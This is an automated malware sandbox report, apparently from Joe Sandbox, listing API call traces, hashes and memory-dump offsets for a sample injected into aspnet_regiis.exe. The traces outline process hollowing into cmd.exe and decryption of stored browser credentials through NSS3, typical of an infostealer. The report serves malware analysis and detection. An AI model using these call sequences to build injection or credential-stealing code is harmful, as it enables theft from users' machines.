                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                              • Opcode ID: 118aa161d4c57619a928e3f95566294e6e28b61ffef584296ab069f10dcfaabb
                                                                                                                                                                              • Instruction ID: f580a7b2c5f71ba5bd75ebbab55fe4baa037511d15839a810041c35a8945e8a6
                                                                                                                                                                              • Opcode Fuzzy Hash: 118aa161d4c57619a928e3f95566294e6e28b61ffef584296ab069f10dcfaabb
                                                                                                                                                                              • Instruction Fuzzy Hash: A5117F71A40705ABC724CFB9DDC5BAAF7F4EB40714F24492DE55AD7280EA70B984C614
                                                                                                                                                                              APIs
                                                                                                                                                                              • malloc.MSVCRT ref: 02A1CBC9
                                                                                                                                                                                • Part of subcall function 02A1BB6C: lstrlen.KERNEL32(?,02A1CBDA,02A1CC7C,00000000,06400000,00000003,00000000,02A1757F,.exe,02A36C5C,02A36C58,02A36C54,02A36C50,02A36C4C,02A36C48,02A36C44), ref: 02A1BB9E
                                                                                                                                                                                • Part of subcall function 02A1BB6C: malloc.MSVCRT ref: 02A1BBA6
                                                                                                                                                                                • Part of subcall function 02A1BB6C: lstrcpy.KERNEL32(00000000,?), ref: 02A1BBB1
                                                                                                                                                                              • malloc.MSVCRT ref: 02A1CC06
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2974738957-0
                                                                                                                                                                              • Opcode ID: b2212fec567117c1da25f445b290e234b7ffb84c8bdcbac0975a90a9c15bff6a
                                                                                                                                                                              • Instruction ID: ad0e3aea15008e254a9eff82c5f2887aec07352c5d8e8514b6d849ebf6d3316c
                                                                                                                                                                              • Opcode Fuzzy Hash: b2212fec567117c1da25f445b290e234b7ffb84c8bdcbac0975a90a9c15bff6a
                                                                                                                                                                              • Instruction Fuzzy Hash: 75F0B47A589215ABD7206FAAED4091ABB96FB447B4F054523EE08DB250DE30DC11C7B2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 199be4f181c0d7eab8ea107b01fac6d22f47b94d037dd4c2175186a33604df0b
                                                                                                                                                                              • Instruction ID: 172c2096e548c02714c5c999a3ee0ad6b6ae282bc8565d204ba9ec38a7387286
                                                                                                                                                                              • Opcode Fuzzy Hash: 199be4f181c0d7eab8ea107b01fac6d22f47b94d037dd4c2175186a33604df0b
                                                                                                                                                                              • Instruction Fuzzy Hash: 06515E71941200AFEE717BEE92C9BB8F6D7EFA4338F140486E4188A136DF2D89844E51
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 049b4271b368f44ff3a2dd87f0e52ba0835dc33d4d0fa5a3db4acb635d7fc430
                                                                                                                                                                              • Instruction ID: 53708bbef46ef7173f9bba6e358476952c30b4813155582d6c40307b37e0bf7b
                                                                                                                                                                              • Opcode Fuzzy Hash: 049b4271b368f44ff3a2dd87f0e52ba0835dc33d4d0fa5a3db4acb635d7fc430
                                                                                                                                                                              • Instruction Fuzzy Hash: 58319C71E002149FDF16DF59EDC09ADFBB2EF84360B20415AD515AB290DF30AA81CF90
                                                                                                                                                                              APIs
                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FolderPathlstrcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1699248803-0
                                                                                                                                                                              • Opcode ID: de1b1f0d0a0b2d02a35bd2244b8dcaea3b6c5781ca62a4ae122468a7d9e4cca9
                                                                                                                                                                              • Instruction ID: 47256ccab5fad08f720846485074452d33a6daa5fc7df7487c88bd9bfabf0416
                                                                                                                                                                              • Opcode Fuzzy Hash: de1b1f0d0a0b2d02a35bd2244b8dcaea3b6c5781ca62a4ae122468a7d9e4cca9
                                                                                                                                                                              • Instruction Fuzzy Hash: 0FF03071E4015DABDB15DF78DC509AEB7FDEB44210F0005B5A905D3140DA30DF458F90
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,02A0DA7F,?,?,?), ref: 02A11D99
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                              • Opcode ID: af3e6f901a0d29f7d341dd59802f9049676a1ea82b41c2d5beab992b3759b59f
                                                                                                                                                                              • Instruction ID: 69f1a3b3d1085db76bd3457846183330f940f38f9f4e278b60ed943357431be7
                                                                                                                                                                              • Opcode Fuzzy Hash: af3e6f901a0d29f7d341dd59802f9049676a1ea82b41c2d5beab992b3759b59f
                                                                                                                                                                              • Instruction Fuzzy Hash: A8D0A731D40338574B5156ACFC8459EBB19CB056F47044360FE6DDA1E0CB209DA247D0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                              • Opcode ID: db1d6af5acd066d91e30403356a157be2d1f8d3fb3904a5adefdb7abb444fcdc
                                                                                                                                                                              • Instruction ID: 69caa03814b402e178ef362ea9c8bd70055b3b3cbea1363d91bc17eb90e8a878
                                                                                                                                                                              • Opcode Fuzzy Hash: db1d6af5acd066d91e30403356a157be2d1f8d3fb3904a5adefdb7abb444fcdc
                                                                                                                                                                              • Instruction Fuzzy Hash: 4121D674240B108FC320DF6ED584956B7F5FF49324B1848AEE68A8B722DB72E881CF51
                                                                                                                                                                              APIs
                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A16931,?), ref: 02A11E37
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocLocal
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3494564517-0
                                                                                                                                                                              • Opcode ID: 3cb096e12cfe832a19c68f54d3bfc0096452eaa20cac5aa6b5466f6dbfe7a6eb
                                                                                                                                                                              • Instruction ID: 607d899ea3ea1089956e29e81c93e7db28777f12104ba9f48db74e5b5658221b
                                                                                                                                                                              • Opcode Fuzzy Hash: 3cb096e12cfe832a19c68f54d3bfc0096452eaa20cac5aa6b5466f6dbfe7a6eb
                                                                                                                                                                              • Instruction Fuzzy Hash: 37E0E53AA41B201F83620AAA8844976BA5B9BC2E787584129DF4CCB344DEB1C8018AE0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 02A15B30
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A15B37
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A15B50
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 02A15B67
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A36A98), ref: 02A15B88
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A36A9C), ref: 02A15BA2
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A15C86
                                                                                                                                                                                • Part of subcall function 02A1580D: _memset.LIBCMT ref: 02A15845
                                                                                                                                                                                • Part of subcall function 02A1580D: _memset.LIBCMT ref: 02A15856
                                                                                                                                                                                • Part of subcall function 02A1580D: lstrcat.KERNEL32(?,00000000), ref: 02A15881
                                                                                                                                                                                • Part of subcall function 02A1580D: lstrcat.KERNEL32(?), ref: 02A1589F
                                                                                                                                                                                • Part of subcall function 02A1580D: lstrcat.KERNEL32(?,?), ref: 02A158B3
                                                                                                                                                                                • Part of subcall function 02A1580D: lstrcat.KERNEL32(?), ref: 02A158C6
                                                                                                                                                                                • Part of subcall function 02A1580D: StrStrA.SHLWAPI(00000000), ref: 02A1596A
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A15CA9
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A15BC9
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A15CD8
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A15CEC
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A15D1A
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A15D2D
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A15D39
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A15D56
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocateCloseCopyDeleteFirstNextProcessSystemTime
                                                                                                                                                                              • String ID: %s\%s$%s\*
                                                                                                                                                                              • API String ID: 3662577307-2848263008
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0F57C
                                                                                                                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,02A365A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 02A0F5A0
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02A0F5B2
                                                                                                                                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 02A0F5C4
                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02A0F5E2
                                                                                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 02A0F5F8
                                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 02A0F608
                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,00000000,02A12D61,?,00000000), ref: 02A0F627
                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 02A0F65D
                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,D744E8F4,00000004,00000000), ref: 02A0F684
                                                                                                                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 02A0F696
                                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 02A0F69F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
                                                                                                                                                                              • String ID: ($C:\Windows\System32\cmd.exe
                                                                                                                                                                              • API String ID: 3621800378-4087486346
                                                                                                                                                                              APIs
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A0CD5C
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 02A0CD73
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A374EC), ref: 02A0CD94
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A374F0), ref: 02A0CDAE
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • lstrlen.KERNEL32(02A0D3B5,02A36872,02A374F4,?,02A3686F), ref: 02A0CE41
                                                                                                                                                                              • DeleteFileA.KERNEL32(?,02A3750C,02A36873,?,02A37508,02A37504,02A37500,02A374FC), ref: 02A0D122
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0D136
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 02A0D23C
                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 02A0D250
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
                                                                                                                                                                              • String ID: %s\*.*
                                                                                                                                                                              • API String ID: 3967855609-1013718255
                                                                                                                                                                              • Opcode ID: c7f5912f1fab48c90a15ca6fc45ef51cabb5b6b10350063f4fedf86987a21e00
                                                                                                                                                                              • Instruction ID: 534e1b396ec3fce247554414ec65daa98e81f35e968532ac1c84c33be4481a57
                                                                                                                                                                              • Opcode Fuzzy Hash: c7f5912f1fab48c90a15ca6fc45ef51cabb5b6b10350063f4fedf86987a21e00
                                                                                                                                                                              • Instruction Fuzzy Hash: 22D1BD32D8122D9AEF21EB24DE85BDDB7B5AF44324F4141E1A909B3151DF30AF898F90
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_PubDeriveWithKDF.NSS3 ref: 6CBB0F8D
                                                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CBB0FB3
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CBB1006
                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?), ref: 6CBB101C
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBB1033
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBB103F
                                                                                                                                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6CBB1048
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6CBB108E
                                                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CBB10BB
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,00000006,?), ref: 6CBB10D6
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6CBB112E
                                                                                                                                                                                • Part of subcall function 6CBB1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CBB08C4,?,?), ref: 6CBB15B8
                                                                                                                                                                                • Part of subcall function 6CBB1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CBB08C4,?,?), ref: 6CBB15C1
                                                                                                                                                                                • Part of subcall function 6CBB1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBB162E
                                                                                                                                                                                • Part of subcall function 6CBB1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBB1637
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1510409361-0
                                                                                                                                                                              • Opcode ID: 942dea145f414cbc174d8e432170ebf9a50645be9036f3942b0e572dfdd3caf9
                                                                                                                                                                              • Instruction ID: ef895d550424474d01a39df2945494c8509ce2f88c911414b0ae51c9701ccd61
                                                                                                                                                                              • Opcode Fuzzy Hash: 942dea145f414cbc174d8e432170ebf9a50645be9036f3942b0e572dfdd3caf9
                                                                                                                                                                              • Instruction Fuzzy Hash: B071D2B1E002858FDB00CFA5DD94A7AB7B8FF48318F18862CE509A7711EB31D954CB92
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB81C6F,00000000,00000004,?,?), ref: 6CBD6C3F
                                                                                                                                                                                • Part of subcall function 6CC2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC2C2BF
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CB81C6F,00000000,00000004,?,?), ref: 6CBD6C60
                                                                                                                                                                              • PR_ExplodeTime.NSS3(00000000,6CB81C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CB81C6F,00000000,00000004,?,?), ref: 6CBD6C94
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                              • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                              • API String ID: 3534712800-180463219
                                                                                                                                                                              • Opcode ID: db38d16f60db13fb57c85dfa9b0c848da65d5fe7018c9e9ea83b1ee5ef8fb035
                                                                                                                                                                              • Instruction ID: 7ddc49c3fba24916509954dc87e7fa09979ed25965a046c714a824c0add1f68b
                                                                                                                                                                              • Opcode Fuzzy Hash: db38d16f60db13fb57c85dfa9b0c848da65d5fe7018c9e9ea83b1ee5ef8fb035
                                                                                                                                                                              • Instruction Fuzzy Hash: 88513B72B015494FC71CCDADDC526DEBBDAABA4310F48C23AE442DB785D638E906C751
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0A815
                                                                                                                                                                              • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A830
                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 02A0A838
                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A846
                                                                                                                                                                              • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A85A
                                                                                                                                                                              • PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,02A0AAE7), ref: 02A0A89A
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A0A8BB
                                                                                                                                                                              • lstrcat.KERNEL32(02A36803,02A36807), ref: 02A0A8E5
                                                                                                                                                                              • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,02A0B824), ref: 02A0A8EC
                                                                                                                                                                              • lstrcat.KERNEL32(02A36803,02A3680E), ref: 02A0A8FB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4058207798-0
                                                                                                                                                                              • Opcode ID: ef00fc75deab7aa23847ca97e98a907bad51dc4ce4b80593aad02427a2a88e89
                                                                                                                                                                              • Instruction ID: 2c0c1e55a1f4806ddd47f5a54ba5c44071add1b5209cba1de1144b368e312df5
                                                                                                                                                                              • Opcode Fuzzy Hash: ef00fc75deab7aa23847ca97e98a907bad51dc4ce4b80593aad02427a2a88e89
                                                                                                                                                                              • Instruction Fuzzy Hash: F8315CB1D0422AAFDB109F64DDC4AFAB7BCAF08740F4005B6B50EE2141EB748A958F56
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,\*.*,02A36826,?,?,?), ref: 02A0B99B
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A3743C), ref: 02A0B9BC
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A37440), ref: 02A0B9D6
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0BE0B
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
